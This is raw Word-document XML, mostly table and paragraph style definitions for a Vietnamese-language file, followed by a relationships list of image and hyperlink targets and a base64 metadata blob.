    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style50">
    <w:name w:val="_Style 50"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style51">
    <w:name w:val="_Style 51"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style52">
    <w:name w:val="_Style 52"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style53">
    <w:name w:val="_Style 53"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style54">
    <w:name w:val="_Style 54"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style55">
    <w:name w:val="_Style 55"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style56">
    <w:name w:val="_Style 56"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style57">
    <w:name w:val="_Style 57"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style58">
    <w:name w:val="_Style 58"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style59">
    <w:name w:val="_Style 59"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style60">
    <w:name w:val="_Style 60"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style61">
    <w:name w:val="_Style 61"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style62">
    <w:name w:val="_Style 62"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style63">
    <w:name w:val="_Style 63"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style64">
    <w:name w:val="_Style 64"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style65">
    <w:name w:val="_Style 65"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style66">
    <w:name w:val="_Style 66"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style67">
    <w:name w:val="_Style 67"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style68">
    <w:name w:val="_Style 68"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style69">
    <w:name w:val="_Style 69"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style70">
    <w:name w:val="_Style 70"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style71">
    <w:name w:val="_Style 71"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style72">
    <w:name w:val="_Style 72"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style73">
    <w:name w:val="_Style 73"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style74">
    <w:name w:val="_Style 74"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style75">
    <w:name w:val="_Style 75"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style76">
    <w:name w:val="_Style 76"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style77">
    <w:name w:val="_Style 77"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style78">
    <w:name w:val="_Style 78"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>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qFormat/>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style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style87">
    <w:name w:val="_Style 87"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style88">
    <w:name w:val="_Style 88"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style89">
    <w:name w:val="_Style 89"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style90">
    <w:name w:val="_Style 90"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style91">
    <w:name w:val="_Style 91"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style92">
    <w:name w:val="_Style 92"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style93">
    <w:name w:val="_Style 93"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style94">
    <w:name w:val="_Style 94"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style95">
    <w:name w:val="_Style 95"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style96">
    <w:name w:val="_Style 96"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style97">
    <w:name w:val="_Style 97"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style98">
    <w:name w:val="_Style 98"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style99">
    <w:name w:val="_Style 99"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style100">
    <w:name w:val="_Style 100"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style101">
    <w:name w:val="_Style 101"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style102">
    <w:name w:val="_Style 102"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style103">
    <w:name w:val="_Style 103"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style104">
    <w:name w:val="_Style 104"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style105">
    <w:name w:val="_Style 105"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style106">
    <w:name w:val="_Style 106"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="15" w:type="dxa"/>
        <w:left w:w="15" w:type="dxa"/>
        <w:bottom w:w="15" w:type="dxa"/>
        <w:right w:w="15" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style107">
    <w:name w:val="_Style 107"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style108">
    <w:name w:val="_Style 108"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style109">
    <w:name w:val="_Style 109"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style110">
    <w:name w:val="_Style 110"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style111">
    <w:name w:val="_Style 111"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style112">
    <w:name w:val="_Style 112"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style113">
    <w:name w:val="_Style 113"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style114">
    <w:name w:val="_Style 114"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style115">
    <w:name w:val="_Style 115"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style116">
    <w:name w:val="_Style 116"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style117">
    <w:name w:val="_Style 117"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style118">
    <w:name w:val="_Style 118"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style119">
    <w:name w:val="_Style 119"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style120">
    <w:name w:val="_Style 120"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style121">
    <w:name w:val="_Style 121"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style122">
    <w:name w:val="_Style 122"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-V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qFormat/>
    <w:rPr>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Table">
    <w:name w:val="Table"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-V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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SourceCode">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:spacing w:after="100" w:line="269" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100" w:line="269" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B0471D"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001030E8"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001030E8"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001030E8"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001030E8"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AC2AC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2AC8"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>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63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.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settings" Target="settings.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rockyou.txt.gz" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.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webSettings" Target="webSettings.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/th4nhh4i/ServerC-Hai" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.174.162:8000" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kkrypt0nn/wordlists.git" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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BLGr3mB5JklysqMfh+kjGvgOw==">CgMxLjAaIwoBMBIeChwIB0IYCg9UaW1lcyBOZXcgUm9tYW4SBUNhcmRvGh8KATESGgoYCAlSFAoSdGFibGUubXBmeDFrMWY1cHJ0Gh8KATISGgoYCAlSFAoSdGFibGUuam0yYXgzYnJ0OXB3Gh8KATMSGgoYCAlSFAoSdGFibGUuM2N0ejgwZmwzMjlvGh8KATQSGgoYCAlSFAoSdGFibGUubjdxaXF2bDR2endzGh8KATUSGgoYCAlSFAoSdGFibGUuZzQ1NWdrdHBuZDhqGh8KATYSGgoYCAlSFAoSdGFibGUuOHU0aG02OXBwMHZkGh8KATcSGgoYCAlSFAoSdGFibGUuYmViY2hseXNiNXN1Gh8KATgSGgoYCAlSFAoSdGFibGUucDgwaWwyZTc1ZzRjGh8KATkSGgoYCAlSFAoSdGFibGUubGQzcmN2NHNuaDd1GiAKAjEwEhoKGAgJUhQKEnRhYmxlLjFwODNpMnZqOHU4NhogCgIxMRIaChgICVIUChJ0YWJsZS5rZnRnNGdvMjFzZXQaIAoCMTISGgoYCAlSFAoSdGFibGUudWdpZWVsNnNtNzYyGiAKAjEzEhoKGAgJUhQKEnRhYmxlLmppYzJ0Zzhycmt2dxogCgIxNBIaChgICVIUChJ0YWJsZS56OWRwc3M4NmhnNXkaIAoCMTUSGgoYCAlSFAoSdGFibGUubHZhc3EwdTJtYnppGiAKAjE2EhoKGAgJUhQKEnRhYmxlLnNwdDNwbzJqb2JlZxogCgIxNxIaChgICVIUChJ0YWJsZS5jc2NleDRlM2x4emgaIAoCMTgSGgoYCAlSFAoSdGFibGUuczdtaDQ1cGl4enBvGiAKAjE5EhoKGAgJUhQKEnRhYmxlLnoxbXc3YmNsNGh0MhogCgIyMBIaChgICVIUChJ0YWJsZS4zczVuanloNmhiZWEaIAoCMjESGgoYCAlSFAoSdGFibGUua2I4anc1Y21rN3NkGiAKAjIyEhoKGAgJUhQKEnRhYmxlLmlkZ2ZhM2RxaWR3ZRogCgIyMxIaChgICVIUChJ0YWJsZS5ob2Zsc28zbnU4ODQaIAoCMjQSGgoYCAlSFAoSdGFibGUuYm14OTZtZzJvZHFxGiAKAjI1EhoKGAgJUhQKEnRhYmxlLnd3MDBzYm5mY2swdRogCgIyNhIaChgICVIUChJ0YWJsZS5tNjUzbWZqZXh4NDEaIAoCMjcSGgoYCAlSFAoSdGFibGUuOWRucGs5MmphZWF3GiAKAjI4EhoKGAgJUhQKEnRhYmxlLmp4bG9qZnJ0M2lmNhogCgIyORIaChgICVIUChJ0YWJsZS5zOWQ1azc0YnFiem8aIAoCMzASGgoYCAlSFAoSdGFibGUuOGRleXRsc2h5ZDJ6GiAKAjMxEhoKGAgJUhQKEnRhYmxlLnllNWp2eDEydHo0MxogCgIzMhIaChgICVIUChJ0YWJsZS5iaDU4YmVpMXZldHkaJAoCMzMSHgocCAdCGAoPVGltZXMgTmV3IFJvbWFuEgVDYXJkbxokCgIzNBIeChwIB0IYCg9UaW1lcyBOZXcgUm9tYW4SBUNhcmRvGiQKAjM1Eh4KHAgHQhgKD1RpbWVzIE5ldyBSb21hbhIFQ2FyZG8aJAoCMzYSHgocCAdCGAoPVGltZXMgTmV3IFJvbWFuEgVDYXJkbxogCgIzNxIaChgICVIUChJ0YWJsZS5oZ2JhNHJoYm1wb3oaJAoCMzgSHgocCAdCGAoPVGltZXMgTmV3IFJvbWFuEgVDYXJkbxokCgIzORIeChwIB0IYCg9UaW1lcyBOZXcgUm9tYW4SBUNhcmRvGiQKAjQwEh4KHAgHQhgKD1RpbWVzIE5ldyBSb21hbhIFQ2FyZG8aIAoCNDESGgoYCAlSFAoSdGFibGUuZTVqdmpneTFsYzhsGiAKAjQyEhoKGAgJUhQKEnRhYmxlLnk0NW85YjlkMnJ2YxogCgI0MxIaChgICVIUChJ0YWJsZS5zMW5uN2JidGUyN2EaIAoCNDQSGgoYCAlSFAoSdGFibGUuc3VxcDE1dXpibWoxGiAKAjQ1EhoKGAgJUhQKEnRhYmxlLjM3eHV0ajdneTRvNhogCgI0NhIaChgICVIUChJ0YWJsZS50dGozcXc4Zjdmc3kaIAoCNDcSGgoYCAlSFAoSdGFibGUub2lrdzA1Mmdyc3dpGiAKAjQ4EhoKGAgJUhQKEnRhYmxlLmExYmk5c282aHExORogCgI0ORIaChgICVIUChJ0YWJsZS5jdmE4bzEyMjljNzYaIAoCNTASGgoYCAlSFAoSdGFibGUudXJudWVvZzcwcjU4GiAKAjUxEhoKGAgJUhQKEnRhYmxlLjNwaHhvcDNnb2o3MxogCgI1MhIaChgICVIUChJ0YWJsZS44Zzgza3J5d3Y1MHQaIAoCNTMSGgoYCAlSFAoSdGFibGUuazZkbHF6bjVzcDJlGiAKAjU0EhoKGAgJUhQKEnRhYmxlLjhrdm5kNWxuYjduZhogCgI1NRIaChgICVIUChJ0YWJsZS53YWF0ejF1YWV0cWkaIAoCNTYSGgoYCAlSFAoSdGFibGUuandwbjMxbjNud2duGiAKAjU3EhoKGAgJUhQKEnRhYmxlLnR5eHh5eTJ6YWhxZRogCgI1OBIaChgICVIUChJ0YWJsZS5xZGlzbTB3MHBydDkaIAoCNTkSGgoYCAlSFAoSdGFibGUuaGRnMDNkZXE1dHY3GiAKAjYwEhoKGAgJUhQKEnRhYmxlLjJyYmN2eGh4M2xkaBogCgI2MRIaChgICVIUChJ0YWJsZS54amNvYnA4M2tuOGMaIAoCNjISGgoYCAlSFAoSdGFibGUuaW84bnFkdzg0aW9sGiAKAjYzEhoKGAgJUhQKEnRhYmxlLm80aDhhdGhwMjM4axogCgI2NBIaChgICVIUChJ0YWJsZS5namdzajZlcnJ5eDMaIAoCNjUSGgoYCAlSFAoSdGFibGUubXgzZmM1bHozOTFiGiAKAjY2EhoKGAgJUhQKEnRhYmxlLms2NXZqeDJxa2U3eRogCgI2NxIaChgICVIUChJ0YWJsZS5tbmJudzV2ajFhMWsaIAoCNjgSGgoYCAlSFAoSdGFibGUub3Fvejc4c3c0OXEwGiAKAjY5EhoKGAgJUhQKEnRhYmxlLnh4d3V1amFvY3lteBogCgI3MBIaCh